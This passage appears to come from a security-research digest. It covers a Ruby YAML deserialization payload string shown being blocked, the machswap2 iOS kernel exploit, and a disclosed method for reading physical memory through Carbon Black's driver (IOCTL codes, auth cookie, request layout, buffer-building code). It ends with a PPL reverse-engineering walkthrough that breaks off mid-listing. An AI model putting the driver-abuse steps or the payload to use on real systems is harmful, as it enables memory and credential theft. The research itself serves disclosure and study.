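# safe_load raises Psych::DisallowedClass on the payload's entry point
# instead of reviving a Gem::Requirement object.
payload = "--- !ruby/object:Gem::Requirement {}"

begin
  YAML.safe_load(payload)
  puts "loaded (unexpected)"
rescue Psych::DisallowedClass => e
  puts "blocked: #{e.message}"
end
```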
  17. machswap2
An iOS kernel exploit for iOS 11 - 12.1.2. Based on the task_swap_mach_voucher bug (CVE-2019-6225), jointly discovered/released by @S0rryMyBad and @bazad. Somewhat loosely based on @s1guza's v0rtex exploit and @tihmstar's v3ntex exploit. Works on A7 - A11 devices (no A12, as I have no A12 device). Many thanks to @s1guza, @littlelailo, and @qwertyoruiopz.
Twitter - https://twitter.com/iBSparkes
Source: https://github.com/PsychoTea/machswap2
  18. Bill Demirkapi's Blog
The adventures of a 17-year-old security researcher.
Reading Physical Memory using Carbon Black's Endpoint driver
Enterprises rely on endpoint security software in order to secure machines that have access to the enterprise network. Usually considered the next step in the evolution of anti-virus solutions, endpoint protection software can protect against various attacks, such as an employee running a Microsoft Word document with macros and other conventional attacks against enterprises. In this article, I'll be looking at Carbon Black's endpoint protection software and the vulnerabilities attackers can take advantage of. Everything I am going to review in this article has been reported to Carbon Black, and they have said it is not a real security issue because it requires Administrator privileges.
Driver Authentication
The Carbon Black driver (cbk7.sys) has a basic authentication requirement before accepting IOCTLs. After opening the "\\.\CarbonBlack" pipe, you must send "good job you can use IDA, you get a cookie\x0\x0\x0\x0\x0\x0\x0\x0" with the IOCTL code 0x81234024.
Setting Acquisition Mode
The acquisition mode is a value the driver uses to determine what method to take when reading physical memory; we'll get into this in the next section. To set the acquisition mode, an attacker must send the new acquisition value in the input buffer for the IOCTL 0x8123C144 as a uint32_t.
Physical Memory Read Access
The Carbon Black Endpoint Sensor driver has an IOCTL (0x8123C148) that allows you to read an arbitrary physical memory address. It gives an attacker three methods/options of reading physical memory:
If Acquisition Mode is set to 0, the driver uses MmMapIoSpace to map the physical memory, then copies the data.
If Acquisition Mode is set to 1, the driver opens the "\Device\PhysicalMemory" section and copies the data.
If Acquisition Mode is set to 2, the driver translates the physical address to a virtual address and copies that.
To read physical memory, you must send the following buffer:
struct PhysicalMemReadRequest {
  uint64_t ptrtoread;   // The physical memory address you'd like to read.
  uint64_t bytestoread; // The number of bytes to read.
};
The output buffer size should be bytestoread.
CR3 Access
Carbon Black was nice enough to have another IOCTL (0x8123C140) that gives a list of known physical memory ranges (it calls MmGetPhysicalMemoryRanges) and provides the CR3 register (Directory Base). This is great news for an attacker, because it means they don't have to predict/bruteforce a directory base and can instead convert a physical memory address directly to a kernel virtual address with ease (and vice versa!). To call this IOCTL, you need to provide an empty input buffer and an output buffer with a minimum size of 0x938 bytes. To get the CR3, simply do *(uint64_t*)(outputbuffer).
Impact
You might ask what the big deal is if you need Administrator for this exploit. The issue I have is that the Carbon Black endpoint software will probably not be on an average home PC, but rather on corporate endpoints. If a company is willing to purchase software such as Carbon Black to protect its endpoints, it is probably taking other security measures too. This might include having a whitelisted driver system, Secure Boot, LSA Protection, etc. If an attacker gains Administrator on the endpoint (i.e. if the parent process was elevated), they could not only disable the protection of Carbon Black, but could use its driver to read sensitive information (like the memory of lsass.exe if LSA Protection is on). My point is, this vulnerability allows an attacker to use a whitelisted driver to access any memory on the system, most likely undetected by any anti-virus on the system. I don't know about you, but to me this is not something I'd accept from the software that's supposed to protect me.
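The byte layout of these requests is trivial to build. Here is a hedged sketch (written in Ruby for consistency with the other examples in this digest; the actual DeviceIoControl call is Windows-specific and omitted, so only the buffer construction is shown):

```ruby
# Build the raw buffers for the Carbon Black driver IOCTLs described
# above. Sending them would require opening \\.\CarbonBlack and calling
# DeviceIoControl on Windows; only the byte layout is sketched here.

AUTH_IOCTL  = 0x81234024
READ_IOCTL  = 0x8123C148
AUTH_COOKIE = "good job you can use IDA, you get a cookie" + "\x00" * 8

# PhysicalMemReadRequest: two little-endian uint64_t fields,
# ptrtoread followed by bytestoread.
def phys_read_request(phys_addr, num_bytes)
  [phys_addr, num_bytes].pack("Q<Q<")
end

buf = phys_read_request(0x1000, 0x100)
puts buf.bytesize  # 16 bytes: 8 for the address, 8 for the length
```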
The hashes of the cbk7.sys driver are ec5b804c2445e84507a737654fd9aae8 (MD5) and 2afe12bfcd9a5ef77091604662bbbb8d7739b9259f93e94e1743529ca04ae1c3 (SHA256).
Written on February 14, 2019
Source: https://d4stiny.github.io/Reading-Physical-Memory-using-Carbon-Black/
  19. Casa De P(a)P(e)L
Explaining Apple's Page Protection Layer in A12 CPUs
Jonathan Levin, (@Morpheus______), http://newosxbook.com/ - 03/02/2019
About
Apple's A12 kernelcaches, aside from being "1469"-style (monolithic and stripped), also have additional segments marked PPL. These pertain to a new memory protection mechanism introduced in those chips - of clear importance to system security (and, conversely, JailBreaking). Yet up till now there has been scarcely any mention of what PPL is and/or what it does. I cover pmap and PPL in the upcoming Volume II, but seeing as it's taking me a while, I haven't written any articles in just about a year (and, fresh off binge-watching the article's title inspiration), I figured that some detail on how to reverse engineer PPL would be of benefit to my readers. So here goes. You might want to grab a copy of the iPhone 11 (whichever variant, doesn't matter) iOS 12 kernelcache before reading this, since this is basically a step-by-step tutorial. Since I'm using jtool2, you probably want to grab the nightly build so you can follow along. This also makes for an informal jtool2 tutorial, because anyone not reading the WhatsNew.txt might not be aware of the really powerful features I put into it.
Kernelcache differences
As previously mentioned, A12 kernelcaches have new PPL* segments, as visible with jtool2 -l:
morpheus@Chimera (~) % jtool2 -l ~/Downloads/kernelcache.release.iphone11 | grep PPL
opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35
LC 03: LC_SEGMENT_64 Mem: 0xfffffff008f44000-0xfffffff008f58000 __PPLTEXT
       Mem: 0xfffffff008f44000-0xfffffff008f572e4 __PPLTEXT.__text
LC 04: LC_SEGMENT_64 Mem: 0xfffffff008f58000-0xfffffff008f68000 __PPLTRAMP
       Mem: 0xfffffff008f58000-0xfffffff008f640c0 __PPLTRAMP.__text
LC 05: LC_SEGMENT_64 Mem: 0xfffffff008f68000-0xfffffff008f6c000 __PPLDATA_CONST
       Mem: 0xfffffff008f68000-0xfffffff008f680c0 __PPLDATA_CONST.__const
LC 07: LC_SEGMENT_64 Mem: 0xfffffff008f70000-0xfffffff008f74000 __PPLDATA
       Mem: 0xfffffff008f70000-0xfffffff008f70de0 __PPLDATA.__data
These segments each contain one section, and thankfully they are pretty self-explanatory. We have:
__PPLTEXT.__text: the code of the PPL layer.
__PPLTRAMP.__text: containing "trampoline" code to jump into the __PPLTEXT.__text
__PPLDATA.__data: r/w data
__PPLDATA_CONST.__const: r/o data.
The separation of PPLDATA from PPLDATA_CONST.__const is similar to the kernelcache using __DATA and __DATA_CONST, so KTRR can kick in and protect the constant data from being patched. The PPLTRAMP hints that there is a special code path which must be taken in order for PPL to be active. Presumably, the chip can detect those "well known" segment names and ensure PPL code isn't just invoked arbitrarily somewhere else in kernel space.
PPL trampoline
Starting with the trampoline code, we jtool2 -d (working on the kernelcache while it's compressed is entirely fine). So we try, only to find out the text section is full of DCD 0x0.
jtool2 doesn't filter - I delegate that to grep(1), so we try: morpheus@Chimera (~) % jtool2 -d __PPLTRAMP.__text ~/Downloads/kernelcache.release.iphone11 | grep -v DCD Disassembling 49344 bytes from address 0xfffffff008f58000 (offset 0x1f54000): fffffff008f5bfe0 0xd53b4234 MRS X20, DAIF ; fffffff008f5bfe4 0xd50347df MSR DAIFSet, #7 ; X - 0 0x0 fffffff008f5bfe8 ---------- *MOVKKKK X14, 0x4455445564666677 ; fffffff008f5bff8 0xd51cf22e MSR ARM64_REG_APRR_EL1, X14 ; X - 14 0x0 fffffff008f5bffc 0xd5033fdf ISB ; fffffff008f5c000 0xd50347df MSR DAIFSet, #7 ; X - 0 0x0 fffffff008f5c004 ---------- *MOVKKKK X14, 0x4455445564666677 ; fffffff008f5c014 0xd53cf235 MRS X21, ARM64_REG_APRR_EL1 ; fffffff008f5c018 0xeb1501df CMP X14, X21, ... ; fffffff008f5c01c 0x540005e1 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c020 0xf10111ff CMP X15, #68 ; fffffff008f5c024 0x540005a2 B.CS 0xfffffff008f5c0d8 ; fffffff008f5c028 0xd53800ac MRS X12, MPIDR_EL1 ; fffffff008f5c02c 0x92781d8d AND X13, X12, #0xff00 ; fffffff008f5c030 0xd348fdad UBFX X13, X13#63 ; fffffff008f5c034 0xf10009bf CMP X13, #2 ; fffffff008f5c038 0x54000002 B.CS 0xfffffff008f5c038 ; fffffff008f5c03c 0xd0ff054e ADRP X14, 2089130 ; R14 = 0xfffffff007006000 fffffff008f5c040 0x9107c1ce ADD X14, X14, #496 ; R14 = R14 + 0x1f0 = 0xfffffff0070061f0 fffffff008f5c044 0xf86d79cd -LDR X13, [X14, X13 ...] 
; R0 = 0x0 fffffff008f5c048 0x92401d8c AND X12, X12, #0xff ; fffffff008f5c04c 0x8b0d018c ADD X12, X12, X13 ; R12 = R12 + 0x0 = 0x0 fffffff008f5c050 0x900000ad ADRP X13, 20 ; R13 = 0xfffffff008f70000 fffffff008f5c054 0x910c01ad ADD X13, X13, #768 ; R13 = R13 + 0x300 = 0xfffffff008f70300 fffffff008f5c058 0xf100199f CMP X12, #6 ; fffffff008f5c05c 0x54000002 B.CS 0xfffffff008f5c05c ; fffffff008f5c060 0xd280300e MOVZ X14, 0x180 ; R14 = 0x180 fffffff008f5c064 0x9b0e358c MADD X12, X12, X14, X13 ; fffffff008f5c068 0xb9402189 LDR W9, [X12, #32] ; ...R9 = *(R12 + 32) = *0x20 fffffff008f5c06c 0x7100013f CMP W9, #0 ; fffffff008f5c070 0x54000180 B.EQ 0xfffffff008f5c0a0 ; fffffff008f5c074 0x7100053f CMP W9, #1 ; fffffff008f5c078 0x540002c0 B.EQ 0xfffffff008f5c0d0 ; fffffff008f5c07c 0x71000d3f CMP W9, #3 ; fffffff008f5c080 0x540002c1 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c084 0x71000d5f CMP W10, #3 ; fffffff008f5c088 0x54000281 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c08c 0x52800029 MOVZ W9, 0x1 ; R9 = 0x1 fffffff008f5c090 0xb9002189 STR W9, [X12, #32] ; *0x20 = R9 fffffff008f5c094 0xf9400d80 LDR X0, [X12, #24] ; ...R0 = *(R12 + 24) = *0x18 fffffff008f5c098 0x9100001f ADD X31, X0, #0 ; R31 = R0 + 0x0 = 0x18 fffffff008f5c09c 0x17aa1e6e B 0xfffffff0079e3a54 ; fffffff008f5c0a0 0x7100015f CMP W10, #0 ; fffffff008f5c0a4 0x540001a1 B.NE 0xfffffff008f5c0d8 ; fffffff008f5c0a8 0x5280002d MOVZ W13, 0x1 ; R13 = 0x1 fffffff008f5c0ac 0xb900218d STR W13, [X12, #32] ; *0x20 = R13 fffffff008f5c0b0 0xb0ff4329 ADRP X9, 2091109 ; R9 = 0xfffffff0077c1000 fffffff008f5c0b4 0x913c8129 ADD X9, X9, #3872 ; R9 = R9 + 0xf20 = 0xfffffff0077c1f20 fffffff008f5c0b8 0xf86f792a -LDR X10, [X9, X15 ...] 
; R0 = 0x0 fffffff008f5c0bc 0xf9400989 LDR X9, [X12, #16] ; ...R9 = *(R12 + 16) fffffff008f5c0c0 0x910003f5 ADD X21, SP, #0 ; R21 = R31 + 0x0 fffffff008f5c0c4 0x9100013f ADD X31, X9, #0 ; R31 = R9 + 0x0 = 0x10971a008 fffffff008f5c0c8 0xf9000595 STR X21, [X12, #8] ; *0x8 = R21 fffffff008f5c0cc 0x17aa210f B 0xfffffff0079e4508 ; fffffff008f5c0d0 0xf940058a LDR X10, [X12, #8] ; ...R10 = *(R12 + 8) = *0x8 fffffff008f5c0d4 0x9100015f ADD X31, X10, #0 ; R31 = R10 + 0x0 = 0x8 fffffff008f5c0d8 0xd280004f MOVZ X15, 0x2 ; R15 = 0x2 fffffff008f5c0dc 0xaa1403ea MOV X10, X20 ; fffffff008f5c0e0 0x14001fc3 B 0xfffffff008f63fec ; fffffff008f5c0e4 0xd280000f MOVZ X15, 0x0 ; R15 = 0x0 fffffff008f5c0e8 0x910002bf ADD X31, X21, #0 ; R31 = R21 + 0x0 = 0x18 fffffff008f5c0ec 0xaa1403ea MOV X10, X20 ; fffffff008f5c0f0 0xf900059f STR XZR, [X12, #8] ; *0x8 = R31 fffffff008f5c0f4 0xb9402189 LDR W9, [X12, #32] ; ...R9 = *(R12 + 32) = *0x20 fffffff008f5c0f8 0x7100053f CMP W9, #1 ; fffffff008f5c0fc 0x54000001 B.NE 0xfffffff008f5c0fc ; fffffff008f5c100 0x52800009 MOVZ W9, 0x0 ; R9 = 0x0 fffffff008f5c104 0xb9002189 STR W9, [X12, #32] ; *0x20 = R9 fffffff008f5c108 0x14001fb9 B 0xfffffff008f63fec ; -------------- fffffff008f63fec ---------- *MOVKKKK X14, 0x4455445464666477 ; fffffff008f63ffc 0xd51cf22e MSR ARM64_REG_APRR_EL1, X14 ; X - 14 0x44554454646665f7 fffffff008f64000 0xd5033fdf ISB ; fffffff008f64004 0xf1000dff CMP X15, #3 ; fffffff008f64008 0x54000520 B.EQ 0xfffffff008f640ac ; fffffff008f6400c 0xf27a095f TST X10, #448 ; fffffff008f64010 0x54000140 B.EQ 0xfffffff008f64038 ; fffffff008f64014 0xf27a055f TST X10, #192 ; fffffff008f64018 0x540000c0 B.EQ 0xfffffff008f64030 ; fffffff008f6401c 0xf278015f TST X10, #256 ; fffffff008f64020 0x54000040 B.EQ 0xfffffff008f64028 ; fffffff008f64024 0x14000006 B 0xfffffff008f6403c ; fffffff008f64028 0xd50344ff MSR DAIFClr, #4 ; X - 0 0x0 fffffff008f6402c 0x14000004 B 0xfffffff008f6403c ; fffffff008f64030 0xd50343ff MSR DAIFClr, #3 ; X - 0 0x0 fffffff008f64034 
0x14000002 B 0xfffffff008f6403c ; fffffff008f64038 0xd50347ff MSR DAIFClr, #7 ; X - 0 0x0 fffffff008f6403c 0xf10005ff CMP X15, #1 ; fffffff008f64040 0x54000380 B.EQ 0xfffffff008f640b0 ; fffffff008f64044 0xd538d08a MRS X10, TPIDR_EL1 ; fffffff008f64048 0xb944714c LDR W12, [X10, #1136] ; ...R12 = *(R10 + 1136) = *0x470 fffffff008f6404c 0x3500004c CBNZ X12, 0xfffffff008f64054 ; fffffff008f64050 0x17a9fedb B 0xfffffff0079e3bbc ; fffffff008f64054 0x5100058c SUB W12, W12, #1 ; fffffff008f64058 0xb904714c STR W12, [X10, #1136] ; *0x470 = R12 fffffff008f6405c 0xd53b4221 MRS X1, DAIF ; fffffff008f64060 0xf279003f TST X1, #128 ; fffffff008f64064 0x540001a1 B.NE 0xfffffff008f64098 ; fffffff008f64068 0xb500018c CBNZ X12, 0xfffffff008f64098 ; fffffff008f6406c 0xd50343df MSR DAIFSet, #3 ; X - 0 0x0 fffffff008f64070 0xf942354c LDR X12, [X10, #1128] ; ...R12 = *(R10 + 1128) = *0x468 fffffff008f64074 0xf940318e LDR X14, [X12, #96] ; ...R14 = *(R12 + 96) = *0x4c8 fffffff008f64078 0xf27e01df TST X14, #4 ; fffffff008f6407c 0x540000c0 B.EQ 0xfffffff008f64094 ; fffffff008f64080 0xaa0003f4 MOV X20, X0 ; fffffff008f64084 0xaa0f03f5 MOV X21, X15 ; fffffff008f64088 0x97aae7de BL 0xfffffff007a1e000 ; _func_fffffff007a1e000 _func_fffffff007a1e000(ARG0); fffffff008f6408c 0xaa1503ef MOV X15, X21 ; fffffff008f64090 0xaa1403e0 MOV X0, X20 ; fffffff008f64094 0xd50343ff MSR DAIFClr, #3 ; X - 0 0x0 fffffff008f64098 0xa9417bfd LDP X29, X30, [SP, #0x10] ; fffffff008f6409c 0xa8c257f4 LDP X20, X21, [SP], #0x20 ; fffffff008f640a0 0xf10009ff CMP X15, #2 ; fffffff008f640a4 0x54000080 B.EQ 0xfffffff008f640b4 ; fffffff008f640a8 0xd65f0fff RETAB ; fffffff008f640ac 0xd61f0320 BR X25 ; fffffff008f640b0 0x17ab113a B 0xfffffff007a28598 ; _panic_trap_to_debugger fffffff008f640b4 0xb0000100 ADRP X0, 33 ; R0 = 0xfffffff008f85000 fffffff008f640b8 0x91102000 ADD X0, X0, #1032 ; R0 = R0 + 0x408 = 0xfffffff008f85408 fffffff008f640bc 0x17ab1126 B 0xfffffff007a28554 ; _panic We see that the code in the PPLTRAMP is pretty 
sparse (lots of DCD 0x0s have been weeded out). But it's not entirely clear how and where we get to this code. We'll get to that soon. Observe that the code is seemingly dependent on X15, which must be less than 68 (per the check at 0xfffffff008f5c020). A bit further down, we see an LDR X10, [X9, X15 ...], which is a classic switch()/table-style statement, using 0xfffffff0077c1f20 as a base:
fffffff008f5c020 0xf10111ff CMP X15, #68 ;
fffffff008f5c024 0x540005a2 B.CS 0xfffffff008f5c0d8 ;
...
fffffff008f5c0b0 0xb0ff4329 ADRP X9, 2091109 ; R9 = 0xfffffff0077c1000
fffffff008f5c0b4 0x913c8129 ADD X9, X9, #3872 ; R9 = R9 + 0xf20 = 0xfffffff0077c1f20
fffffff008f5c0b8 0xf86f792a -LDR X10, [X9, X15 ...] ; R0 = 0x0
Peeking at that address, we see:
morpheus@Chimera (~/) % jtool2 -d 0xfffffff0077c1f20 ~/Downloads/kernelcache.release.iphone11 | head -69
0xfffffff0077c1fa0: 0xfffffff008f4cef8 __func_0xfffffff008f4cef8 0xfffffff0077c1fa8: 0xfffffff008f4c038 __func_0xfffffff008f4c038 0xfffffff0077c1fb0: 0xfffffff008f48420 __func_0xfffffff008f48420 0xfffffff0077c1fb8: 0xfffffff008f4bacc __func_0xfffffff008f4bacc 0xfffffff0077c1fc0: 0xfffffff008f4b754 __func_0xfffffff008f4b754 0xfffffff0077c1fc8: 0xfffffff008f4b458 __func_0xfffffff008f4b458 0xfffffff0077c1fd0: 0xfffffff008f4b3a0 __func_0xfffffff008f4b3a0 0xfffffff0077c1fd8: 0xfffffff008f4afc4 __func_0xfffffff008f4afc4 0xfffffff0077c1fe0: 0xfffffff008f4afbc __func_0xfffffff008f4afbc 0xfffffff0077c1fe8: 0xfffffff008f4acec __func_0xfffffff008f4acec 0xfffffff0077c1ff0: 0xfffffff008f4ac38 __func_0xfffffff008f4ac38 0xfffffff0077c1ff8: 0xfffffff008f4ac34 __func_0xfffffff008f4ac34 0xfffffff0077c2000: 0xfffffff008f4aa78 __func_0xfffffff008f4aa78 0xfffffff0077c2008: 0xfffffff008f4a8b0 __func_0xfffffff008f4a8b0 0xfffffff0077c2010: 0xfffffff008f4a8a0 __func_0xfffffff008f4a8a0 0xfffffff0077c2018: 0xfffffff008f4a730 __func_0xfffffff008f4a730 0xfffffff0077c2020: 0xfffffff008f4a09c __func_0xfffffff008f4a09c 0xfffffff0077c2028: 0xfffffff008f4a098 __func_0xfffffff008f4a098 0xfffffff0077c2030: 0xfffffff008f49fbc __func_0xfffffff008f49fbc 0xfffffff0077c2038: 0xfffffff008f49d0c __func_0xfffffff008f49d0c 0xfffffff0077c2040: 0xfffffff008f49c08 __func_0xfffffff008f49c08 0xfffffff0077c2048: 0xfffffff008f49940 __func_0xfffffff008f49940 0xfffffff0077c2050: 0xfffffff008f494c0 __func_0xfffffff008f494c0 0xfffffff0077c2058: 0xfffffff008f492e8 __func_0xfffffff008f492e8 0xfffffff0077c2060: 0xfffffff008f47d54 __func_0xfffffff008f47d54 0xfffffff0077c2068: 0xfffffff008f47d58 __func_0xfffffff008f47d58 0xfffffff0077c2070: 0xfffffff008f46ea0 __func_0xfffffff008f46ea0 0xfffffff0077c2078: 0xfffffff008f46a50 __func_0xfffffff008f46a50 0xfffffff0077c2080: 0xfffffff008f45ef8 __func_0xfffffff008f45ef8 0xfffffff0077c2088: 0xfffffff008f45ca0 __func_0xfffffff008f45ca0 0xfffffff0077c2090: 0xfffffff008f45a80 
__func_0xfffffff008f45a80 0xfffffff0077c2098: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20a0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20a8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20b0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20b8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20c0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20c8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20d0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20d8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20e0: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20e8: 00 00 00 00 00 00 00 00 ........ 0xfffffff0077c20f0: 0xfffffff008f457b8 __func_0xfffffff008f457b8 0xfffffff0077c20f8: 0xfffffff008f456e4 __func_0xfffffff008f456e4 0xfffffff0077c2100: 0xfffffff008f455c8 __func_0xfffffff008f455c8 0xfffffff0077c2108: 0xfffffff008f454bc __func_0xfffffff008f454bc 0xfffffff0077c2110: 0xfffffff008f45404 __func_0xfffffff008f45404 0xfffffff0077c2118: 0xfffffff008f45274 __func_0xfffffff008f45274 0xfffffff0077c2120: 0xfffffff008f446c0 __func_0xfffffff008f446c0 0xfffffff0077c2128: 0xfffffff008f445b0 __func_0xfffffff008f445b0 0xfffffff0077c2130: 0xfffffff008f441dc __func_0xfffffff008f441dc 0xfffffff0077c2138: 0xfffffff008f44010 __func_0xfffffff008f44010 0xfffffff0077c2140: 00 00 00 00 00 00 00 00 ........ Clearly, a dispatch table - function pointers aplenty. Where do these lie? Taking any one of them and subjecting to jtool2 -a will locate it: morpheus@Chimera (~) %jtool2 -a 0xfffffff008f457b8 ~/Downloads/kernelcache.release.iphone11 Address 0xfffffff008f457b8 (offset 0x1f417b8) is in __PPLTEXT.__text This enables us to locate functions in __PPLTEXT.__text, whose addresses are not exported by LC_FUNCTION_STARTS. So that's already pretty useful. 
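In other words, the trampoline's bounds check and table load amount to: if X15 < 68, fetch a handler pointer from 0xfffffff0077c1f20 + X15*8. A small model of that dispatch (illustrative only; it merely computes slot addresses, consistent with the dump above):

```ruby
# Model of the PPL trampoline dispatch: a 68-entry table of handler
# pointers at a fixed base, indexed by the routine number in X15.
PPL_TABLE_BASE = 0xfffffff0077c1f20
NUM_ROUTINES   = 68

def ppl_slot_address(x15)
  return nil if x15 >= NUM_ROUTINES  # mirrors CMP X15, #68 / B.CS fail path
  PPL_TABLE_BASE + x15 * 8           # mirrors LDR X10, [X9, X15 ...]
end

printf("slot  0: 0x%x\n", ppl_slot_address(0))   # first entry in the dump
printf("slot 67: 0x%x\n", ppl_slot_address(67))  # 0xfffffff0077c2138, the last entry
p ppl_slot_address(68)                           # out of range => nil
```

Note that slot 67 lands exactly on 0xfffffff0077c2138, the final pointer in the dump before the trailing zero row.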
The __PPLTEXT.__text is pretty big, but we can use a very rudimentary decompilation feature, thanks to jtool2's ability to follow arguments:
morpheus@Chimera (~) % jtool2 -d __PPLTEXT.__text ~/Downloads/kernelcache.release.iphone11 |
   grep -v ^ff |  # Ignore disassembly lines
   grep \"        # get strings
Disassembling 78564 bytes from address 0xfffffff008f44000 (offset 0x1f40000):
_func_fffffff007a28554(""%s: ledger %p array index invalid, index was %#llx"", "pmap_ledger_validate" );
_func_fffffff007a28554(""%s: ledger still referenced, " "ledger=%p"", "pmap_ledger_free_internal");
_func_fffffff007a28554(""%s: invalid ledger ptr %p"", "pmap_ledger_validate");
...
These are obvious panic strings, and _func_fffffff007a28554 is indeed _panic (jtool2 could have immediately symbolicated vast swaths of the kernel if we had used --analyze - I'm deliberately walking step by step here). Note that the panic strings also give us the panicking function. That can get us the symbol names for thirty-something of the functions we found!
They're all "pmap...internal", and jtool2 can just dump the strings (thanks for not redacting, AAPL!): morpheus@Chimera (~)% jtool2 -d __TEXT.__cstring ~/Downloads/kernelcache.release.iphone11 | grep pmap_.*internal Dumping 2853442 bytes from 0xfffffff0074677ec (Offset 0x4637ec, __TEXT.__cstring): 0xfffffff00747027e: pmap_ledger_free_internal 0xfffffff0074702c8: pmap_ledger_alloc_internal 0xfffffff0074706e2: pmap_ledger_alloc_init_internal 0xfffffff007470789: pmap_trim_internal 0xfffffff007470b95: pmap_iommu_ioctl_internal 0xfffffff007470d30: pmap_iommu_unmap_internal 0xfffffff007470d4a: pmap_iommu_map_internal 0xfffffff007470d7f: pmap_iommu_init_internal 0xfffffff007470e3e: pmap_cs_check_overlap_internal 0xfffffff007470e5d: pmap_cs_lookup_internal 0xfffffff007470e75: pmap_cs_associate_internal_options 0xfffffff00747188d: pmap_set_jit_entitled_internal 0xfffffff0074719ba: pmap_cpu_data_init_internal 0xfffffff007471a03: pmap_unnest_options_internal 0xfffffff007471ad7: pmap_switch_user_ttb_internal 0xfffffff007471af5: pmap_switch_internal 0xfffffff007471b0a: pmap_set_nested_internal 0xfffffff007471bcd: pmap_remove_options_internal 0xfffffff007471d61: pmap_reference_internal 0xfffffff007471d79: pmap_query_resident_internal 0xfffffff007471dc2: pmap_query_page_info_internal 0xfffffff007471e05: pmap_protect_options_internal 0xfffffff007471ebd: pmap_nest_internal 0xfffffff007472247: pmap_mark_page_as_ppl_page_internal 0xfffffff007472336: pmap_map_cpu_windows_copy_internal 0xfffffff007472386: pmap_is_empty_internal 0xfffffff00747239d: pmap_insert_sharedpage_internal 0xfffffff007472422: pmap_find_phys_internal 0xfffffff00747243a: pmap_extract_internal 0xfffffff007472450: pmap_enter_options_internal 0xfffffff0074727ee: pmap_destroy_internal 0xfffffff0074729c4: pmap_create_internal 0xfffffff0074729fc: pmap_change_wiring_internal 0xfffffff007472a53: pmap_batch_set_cache_attributes_internal The few functions we do not have, can be figured out by the context of calling them from 
the non-PPL pmap_* wrappers. But we still don't know how we get into PPL. Let's go to the __TEXT_EXEC.__text then.

__TEXT_EXEC.__text

The kernel's __TEXT_EXEC.__text is already pretty large, but adding all the Kext code into it makes it darn huge. AAPL has also stripped the kernel clean in 1469 kernelcaches - but not before leaving a farewell present in iOS 12 β 1 - a fully symbolicated (86,000+) kernel. Don't bother looking for that IPSW - in an unusual admission of a mistake, this is the only beta IPSW in history that has been eradicated. Thankfully, researchers were on to this "move to help researchers", and grabbed a copy when they still could. I did the same, and based jtool2's kernel cache analysis on it. This is the tool formerly known as joker - which, if you're still using - forget about. I no longer maintain that, because now it's built into jtool2, xn00p (my kernel debugger) and soon QiLin - as fully self-contained and portable library code. Running an analysis on the kernelcache is blazing fast - on the order of 8 seconds or so on my MBP2018. Try this:

morpheus@Chimera (~) %time jtool2 --analyze ~/Downloads/kernelcache.release.iphone11
Analyzing kernelcache..
This is an A12 kernelcache (Darwin Kernel Version 18.2.0: Wed Dec 19 20:28:53 PST 2018; root:xnu-4903.242.2~1/RELEASE_ARM64_T8020)
-- Processing __TEXT_EXEC.__text..
Disassembling 22433272 bytes from address 0xfffffff0079dc000 (offset 0x9d8000):
__ZN11OSMetaClassC2EPKcPKS_j is 0xfffffff007fedc64 (OSMetaClass)
Analyzing __DATA_CONST.. processing flows...
Analyzing __DATA.__data..
Analyzing __DATA.__sysctl_set..
Analyzing fuctions... FOUND at 0xfffffff007a2c8e4!
Analyzing __PPLTEXT.__text..
Got 1881 IOKit Classes
opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35
Dumping symbol cache to file
Symbolicated 5070 symbols to ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35
jtool2 --analyze ~/Downloads/kernelcache.release.iphone11 6.07s user 0.32s system 99% cpu 6.447 total

Let's ignore the __PPLTEXT autoanalysis for the moment (TL;DR - stop reading; all the symbols you need are auto-symbolicated by jtool2's jokerlib), and let's look at code which happens to be a PPL client - the despicable AMFI. I'll spare you wandering out and get directly to the function in question:

morpheus@Chimera (~) % JCOLOR=1 jtool2 -d __Z31AMFIIsCodeDirectoryInTrustCachePKh ~/Downloads/kernelcache.release.iphone11
opened companion file ./kernelcache.release.iphone11.ARM64.AD091625-3D05-3841-A1B6-AF60B4D43F35
Disassembling 13991556 bytes from address 0xfffffff0081e8f74 (offset 0x11e4f74):
__Z31AMFIIsCodeDirectoryInTrustCachePKh:
fffffff0081e8f74 0xd503237f PACIBSP ;
fffffff0081e8f78 0xa9bf7bfd STP X29, X30, [SP, #-16]! ;
fffffff0081e8f7c 0x910003fd ADD X29, SP, #0 ; R29 = R31 + 0x0
fffffff0081e8f80 0x97e65da4 BL 0xfffffff007b80610 ; _func_0xfffffff007b80610 _func_0xfffffff007b80610()
fffffff0081e8f84 0x12000000 AND W0, W0, #0x1 ;
fffffff0081e8f88 0xa8c17bfd LDP X29, X30, [SP], #0x10 ;
fffffff0081e8f8c 0xd65f0fff RETAB ;

When used on a function name, jtool2 automatically disassembles to the end of the function. We see that this is merely a wrapper over _func_0xfffffff007b80610.
So we inspect what's there:

morpheus@Chimera (~) %jtool2 -d _func_0xfffffff007b80610 ~/Downloads/kernelcache.release.iphone11
_func_0xfffffff007b80610:
fffffff007b80610 0x17f9ba10 B 0xfffffff0079eee50

So...:

_func_fffffff0079eee50:
fffffff0079eee50 0xd280050f MOVZ X15, 0x28 ; R15 = 0x28
fffffff0079eee54 0x17ffd59e B 0xfffffff0079e44cc ; _ppl_enter
_func_fffffff0079eee58:
fffffff0079eee58 0xd280052f MOVZ X15, 0x29 ; R15 = 0x29
fffffff0079eee5c 0x17ffd59c B 0xfffffff0079e44cc ; _ppl_enter
_func_fffffff0079eee60:
fffffff0079eee60 0xd280042f MOVZ X15, 0x21 ; R15 = 0x21
fffffff0079eee64 0x17ffd59a B 0xfffffff0079e44cc ; _ppl_enter
_func_fffffff0079eee68:
fffffff0079eee68 0xd280082f MOVZ X15, 0x41 ; R15 = 0x41
